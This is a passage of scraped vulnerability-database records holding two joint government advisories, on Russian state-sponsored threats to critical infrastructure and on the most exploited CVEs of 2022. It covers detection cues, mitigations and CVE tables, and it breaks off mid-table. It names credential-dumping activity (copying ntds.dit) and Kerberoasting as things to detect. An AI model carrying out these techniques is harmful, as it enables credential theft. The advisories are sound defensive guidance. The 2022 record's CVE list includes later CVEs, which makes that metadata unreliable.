strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n * Look for one IP used for multiple accounts, excluding expected logins.\n * Look for \u201cimpossible travel.\u201d Impossible travel occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the time period between the logins). **Note:** implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks.\n * Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller. \n * Look for suspicious privileged account use after resetting passwords or applying user account mitigations. \n * Look for unusual activity in typically dormant accounts.\n * Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.\n * For organizations with OT/ICS systems: \n * Take note of unexpected equipment behavior; for example, unexpected reboots of digital controllers and other OT hardware and software. \n * Record delays or disruptions in communication with field equipment or other OT devices. Determine if system parts or components are lagging or unresponsive.\n\n### Incident Response\n\nOrganizations detecting potential APT activity in their IT or OT networks should:\n\n 1. Immediately isolate affected systems. \n 2. Secure backups. Ensure your backup data is offline and secure. If possible, scan your backup data with an antivirus program to ensure it is free of malware.\n 3. Collect and review relevant logs, data, and artifacts.\n 4. Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.\n 5. Report incidents to [CISA](<https://www.cisa.gov/uscert/report>) and/or the FBI via your [local FBI field office](<http://www.fbi.gov/contact-us/field>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).\n\n**Note:** for OT assets, organizations should have a resilience plan that addresses how to operate if you lose access to\u2014or control of\u2014the IT and/or OT environment. Refer to the Mitigations section for more information.\n\nSee the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA, the FBI, and NSA encourage critical infrastructure owners and operators to see CISA\u2019s [Federal Government Cybersecurity Incident and Vulnerability Response Playbooks](<https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf>). Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail each step for both incident and vulnerability response. \n\n**Note: **organizations should document incident response procedures in a cyber incident response plan, which organizations should create and exercise (as noted in the Mitigations section). \n\n### Mitigations\n\nCISA, the FBI, and NSA encourage all organizations to implement the following recommendations to increase their cyber resilience against this threat.\n\n### Be Prepared\n\n#### _Confirm Reporting Processes and Minimize Coverage Gaps_\n\n * Develop internal contact lists. Assign main points of contact for a suspected incident as well as roles and responsibilities and ensure personnel know how and when to report an incident.\n * Minimize gaps in IT/OT security personnel availability by identifying surge support for responding to an incident. Malicious cyber actors are [known to target organizations on weekends and holidays](<https://us-cert.cisa.gov/ncas/alerts/aa21-243a>) when there are gaps in organizational cybersecurity\u2014critical infrastructure organizations should proactively protect themselves by minimizing gaps in coverage.\n * Ensure IT/OT security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any identified IOCs and TTPs for immediate response. (See table 1 for commonly observed TTPs).\n\n#### _Create, Maintain, and Exercise a Cyber Incident Response, Resilience Plan, and Continuity of Operations Plan_\n\n * Create, maintain, and exercise a cyber incident response and continuity of operations plan.\n * Ensure personnel are familiar with the key steps they need to take during an incident and are positioned to act in a calm and unified manner. Key questions: \n * Do personnel have the access they need?\n * Do they know the processes?\n * For OT assets/networks, \n * Identify a resilience plan that addresses how to operate if you lose access to\u2014or control of\u2014the IT and/or OT environment. \n * Identify OT and IT network interdependencies and develop workarounds or manual controls to ensure ICS networks can be isolated if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans, such as manual controls, so that safety critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised.\n * Regularly test manual controls so that critical functions can be kept running if ICS or OT networks need to be taken offline.\n * Implement data backup procedures on both the IT and OT networks. Backup procedures should be conducted on a frequent, regular basis. Regularly test backup procedures and ensure that backups are isolated from network connections that could enable the spread of malware.\n * In addition to backing up data, develop recovery documents that include configuration settings for common devices and critical OT equipment. This can enable more efficient recovery following an incident.\n\n### Enhance your Organization\u2019s Cyber Posture\n\nCISA, the FBI, and NSA recommend organizations apply the best practices below for identity and access management, protective controls and architecture, and vulnerability and configuration management.\n\n#### _Identity and Access Management_\n\n * Require multi-factor authentication for all users, without exception.\n * Require accounts to have strong passwords and do not allow passwords to be used across multiple accounts or stored on a system to which an adversary may have access.\n * Secure credentials. Russian state-sponsored APT actors have demonstrated their ability to maintain persistence using compromised credentials. \n * Use virtualizing solutions on modern hardware and software to ensure credentials are securely stored.\n * Disable the storage of clear text passwords in LSASS memory.\n * Consider disabling or limiting New Technology Local Area Network Manager (NTLM) and WDigest Authentication.\n * Implement Credential Guard for Windows 10 and Server 2016 (Refer to [Microsoft: Manage Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage>) for more information). For Windows Server 2012R2, enable Protected Process Light for Local Security Authority (LSA).\n * Minimize the Active Directory attack surface to reduce malicious ticket-granting activity. Malicious activity such as \u201cKerberoasting\u201d takes advantage of Kerberos\u2019 TGS and can be used to obtain hashed credentials that attackers attempt to crack.\n * Set a [strong](<https://www.us-cert.cisa.gov/ncas/tips/ST04-002>) password policy for service accounts.\n * Audit Domain Controllers to log successful Kerberos TGS requests and ensure the events are monitored for anomalous activity. \n * Secure accounts.\n * Enforce the principle of least privilege. Administrator accounts should have the minimum permission they need to do their tasks.\n * Ensure there are unique and distinct administrative accounts for each set of administrative tasks.\n * Create non-privileged accounts for privileged users and ensure they use the non- privileged accounts for all non-privileged access (e.g., web browsing, email access).\n\n#### _Protective Controls and Architecture_\n\n * Identify, detect, and investigate abnormal activity that may indicate lateral movement by a threat actor or malware. Use network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n * Enable strong spam filters. \n * Enable strong spam filters to prevent phishing emails from reaching end users.\n * Filter emails containing executable files to prevent them from reaching end users.\n * Implement a user training program to discourage users from visiting malicious websites or opening malicious attachments.\n\n**Note:** CISA, the FBI, and NSA also recommend, as a longer-term effort, that critical infrastructure organizations implement network segmentation to separate network segments based on role and functionality. Network segmentation can help prevent lateral movement by controlling traffic flows between\u2014and access to\u2014various subnetworks.\n\n * Appropriately implement network segmentation between IT and OT networks. Network segmentation limits the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.\n * Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit ICS protocols from traversing the IT network.\n\n#### _Vulnerability and Configuration Management_\n\n * Update software, including operating systems, applications, and firmware on IT network assets, in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. \n * Consider using a centralized patch management system. For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program. \n * Consider signing up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>), including vulnerability scanning, to help reduce exposure to threats. CISA\u2019s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IP addresses for accessible services and vulnerabilities.\n * Use industry recommended antivirus programs. \n * Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures.\n * Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.\n * Implement rigorous configuration management programs. Ensure the programs can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses.\n * Disable all unnecessary ports and protocols \n * Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for command and control activity.\n * Turn off or disable any unnecessary services (e.g., PowerShell) or functionality within devices.\n * Ensure OT hardware is in read-only mode.\n\n### Increase Organizational Vigilance\n\n * Regularly review reporting on this threat. Consider signing up for CISA notifications to receive timely information on current security issues, vulnerabilities, and high-impact activity.\n\n### Resources\n\n * For more information on Russian state-sponsored malicious cyber activity, refer to [cisa.gov/Russia.](<https://www.us-cert.cisa.gov/russia>)\n * Refer to CISA Analysis Report [Strengthening Security Configurations to Defend Against Attackers Targeting Cloud Services](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-013a>) for steps for guidance on strengthening your organizations cloud security practices.\n * Leaders of small businesses and small and local government agencies should see [CISA\u2019s Cyber Essentials](<https://www.cisa.gov/cyber-essentials>) for guidance on developing an actionable understanding of implementing organizational cybersecurity practices.\n * Critical infrastructure owners and operators with OT/ICS networks, should review the following resources for additional information: \n * NSA and CISA joint CSA NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems\n * CISA factsheet Rising Ransomware Threat to Operational Technology Assets for additional recommendations.\n\n### Rewards for Justice Program\n\nIf you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State\u2019s Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which DOS is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact +1-202-702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details refer to [rewardsforjustice.net/malicious_cyber_activity.](<https://www.rewardsforjustice.net/malicious_cyber_activity.html>)\n\n### Caveats\n\nThe information you have accessed or received is being provided \u201cas is\u201d for informational purposes only. CISA, the FBI, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, the FBI, or NSA.\n\n### References\n\n[[1] Joint NCSC-CISA UK Advisory: Further TTPs Associated with SVR Cyber Actors](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>)\n\n### Revisions\n\nJanuary 11, 2022: Initial Version|January 25, 2022: Updated broken link|February 28, 2022: Updated broken link\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T12:00:00", "type": "ics", "title": "Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-03-01T12:00:00", "id": "AA22-011A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-011a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-29T21:51:11", "description": "### **SUMMARY**\n\nThe following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):\n\n * United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)\n * Australia: Australian Signals Directorate\u2019s Australian Cyber Security Centre (ACSC)\n * Canada: Canadian Centre for Cyber Security (CCCS)\n * New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)\n * United Kingdom: National Cyber Security Centre (NCSC-UK)\n\nThis advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.\n\nThe authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory\u2014including the following\u2014to reduce the risk of compromise by malicious cyber actors.\n\n * **Vendors, designers, and developers**: Implement [secure-by-design and -default principles and tactics](<https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default> \"Security-by-Design and -Default\" ) to reduce the prevalence of vulnerabilities in your software. \n * **Follow the Secure Software Development Framework (SSDF)**, also known as [SP 800-218](<https://csrc.nist.gov/publications/detail/sp/800-218/final> \"NIST SP 800-218\" ), and implement secure design practices into each stage of the software development life cycle (SDLC). As part of this, establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.\n * **Prioritize secure-by-default configurations**, such as eliminating default passwords, or requiring addition configuration changes to enhance product security.\n * **Ensure that published CVEs include the proper CWE field** identifying the root cause of the vulnerability.\n * **End-user organizations**: \n * **Apply timely patches to systems**. **Note**: First check for signs of compromise if CVEs identified in this CSA have not been patched.\n * Implement a centralized patch management system.\n * **Use security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers**.\n * **Ask your software providers to discuss their secure by design program** and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.\n\nDownload the PDF version of this report:\n\nAA23-215A PDF (PDF, 980.90 KB )\n\n### **TECHNICAL DETAILS**\n\n#### **Key Findings**\n\nIn 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.\n\nMalicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure\u2014the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).\n\nMalicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets\u2019 networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.\n\n#### **Top Routinely Exploited Vulnerabilities**\n\nTable 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )**. **This vulnerability, affecting Fortinet SSL VPNs, was also [routinely exploited in 2020](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a> \"Top Routinely Exploited Vulnerabilities\" ) and [2021](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a> \"2021 Top Routinely Exploited Vulnerabilities\" ). The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )**, **[**CVE-2021-31207**](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )**, **[**CVE-2021-34523**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )**.** These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft\u2019s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.\n * [**CVE-2021-40539**](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )**.** This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability [began in late 2021](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-259a> \"APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus\" ) and [continued throughout 2022](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF> \"Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors\" ).\n * [**CVE-2021-26084**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )**.** This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.\n * [**CVE-2021- 44228**](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )**.** This vulnerability, known as Log4Shell, affects Apache\u2019s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[[1](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance>)] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021- 44228 through the first half of 2022.\n * [**CVE-2022-22954**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" ), [**CVE-2022-22960**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )**.** These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution**. **Exploitation of CVE-2022-22954 and CVE-2022-22960 [began in early 2022](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138b> \"Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control\" ) and attempts continued throughout the remainder of the year.\n * [**CVE-2022-1388**](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )**.** This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication** **on F5 BIG-IP application delivery and security software**.**\n * [**CVE-2022-30190**](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )**.** This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.\n * [**CVE-2022-26134**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" ). This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability ([CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )), which cyber actors also exploited in 2022.\n_Table 1: Top 12 Routinely Exploited Vulnerabilities in 2022_\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Product**\n\n| \n\n**Type**\n\n| \n\n**CWE** \n \n---|---|---|---|--- \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS and FortiProxy\n\n| \n\nSSL VPN credential exposure\n\n| \n\n[CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \$'Path Traversal'\$\" ) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-918 Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \$SSRF\$\" ) \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nSecurity Feature Bypass\n\n| \n\n[CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \$'Path Traversal'\$\" ) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nElevation of Privilege\n\n| \n\n[CWE-287 Improper Authentication](<https://cwe.mitre.org/data/definitions/287.html> \"CWE-287: Improper Authentication\" ) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )\n\n| \n\nZoho ManageEngine\n\n| \n\nADSelfService Plus\n\n| \n\nRCE/\n\nAuthentication Bypass\n\n| \n\n[CWE-287 Improper Authentication](<https://cwe.mitre.org/data/definitions/287.html> \"CWE-287: Improper Authentication\" ) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center\n\n| \n\nArbitrary code execution\n\n| \n\n[CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \$'Injection'\$\" ) \n \n[CVE-2021- 44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )\n\n(Log4Shell)\n\n| \n\nApache\n\n| \n\nLog4j2\n\n| \n\nRCE\n\n| \n\n[CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \$'Expression Language Injection'\$\" )\n\n[CWE-20 Improper Input Validation](<https://cwe.mitre.org/data/definitions/20.html> \"CWE-20: Improper Input Validation\" )\n\n[CWE-400 Uncontrolled Resource Consumption](<https://cwe.mitre.org/data/definitions/400.html> \"CWE-400: Uncontrolled Resource Consumption\" )\n\n[CWE-502 Deserialization of Untrusted Data](<https://cwe.mitre.org/data/definitions/502.html> \"CWE-502: Deserialization of Untrusted Data\" ) \n \n[CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access and Identity Manager\n\n| \n\nRCE\n\n| \n\n[CWE-94 Improper Control of Generation of Code ('Code Injection')](<https://cwe.mitre.org/data/definitions/94.html> \"CWE-94: Improper Control of Generation of Code \$'Code Injection'\$\" ) \n \n[CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, Identity Manager, and vRealize Automation\n\n| \n\nImproper Privilege Management\n\n| \n\n[CWE-269 Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2022-1388](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )\n\n| \n\nF5 Networks\n\n| \n\nBIG-IP\n\n| \n\nMissing Authentication Vulnerability\n\n| \n\n[CWE-306 Missing Authentication for Critical Function](<https://cwe.mitre.org/data/definitions/306.html> \"CWE-306: Missing Authentication for Critical Function\" ) \n \n[CVE-2022-30190](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center\n\n| \n\nRCE\n\n| \n\n[CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \$'Injection'\$\" ) \n \n#### **Additional Routinely Exploited Vulnerabilities**\n\nIn addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities\u2014listed in Table 2\u2014that were also routinely exploited by malicious cyber actors in 2022.\n\n_Table 2: Additional Routinely Exploited Vulnerabilities in 2022_\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Product**\n\n| \n\n**Type**\n\n| \n\n**CWE** \n \n---|---|---|---|--- \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \"CVE-2017-0199\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\nArbitrary Code Execution\n\n| \n\nNone Listed \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \"CVE-2017-11882\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nArbitrary Code Execution\n\n| \n\n[CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer](<https://cwe.mitre.org/data/definitions/119.html> \"CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer\" ) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510> \"CVE-2019-11510\" )\n\n| \n\nIvanti\n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nArbitrary File Reading\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \$'Path Traversal'\$\" ) \n \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708> \"CVE-2019-0708\" )\n\n| \n\nMicrosoft\n\n| \n\nRemote Desktop Services\n\n| \n\nRCE\n\n| \n\n[CWE-416: Use After Free](<https://cwe.mitre.org/data/definitions/416.html> \"CWE-416: Use After Free\" ) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781> \"CVE-2019-19781\" )\n\n| \n\nCitrix\n\n| \n\nApplication Delivery Controller and Gateway\n\n| \n\nArbitrary Code Execution\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \$'Path Traversal'\$\" ) \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902> \"CVE-2020-5902\" )\n\n| \n\nF5 Networks\n\n| \n\nBIG-IP\n\n| \n\nRCE\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \$'Path Traversal'\$\" ) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472> \"CVE-2020-1472\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\nPrivilege Escalation\n\n| \n\n[CWE-330: Use of Insufficiently Random Values](<https://cwe.mitre.org/data/definitions/330.html> \"CWE-330: Use of Insufficiently Random Values\" ) \n \n[CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882> \"CVE-2020-14882\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2020-14883](<https://nvd.nist.gov/vuln/detail/CVE-2020-14883> \"CVE-2020-14883\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016> \"CVE-2021-20016\" )\n\n| \n\nSonicWALL\n\n| \n\nSSLVPN SMA100\n\n| \n\nSQL Injection\n\n| \n\n[CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')](<https://cwe.mitre.org/data/definitions/89.html> \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command \$'SQL Injection'\$\" ) \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855> \"CVE-2021-26855\" 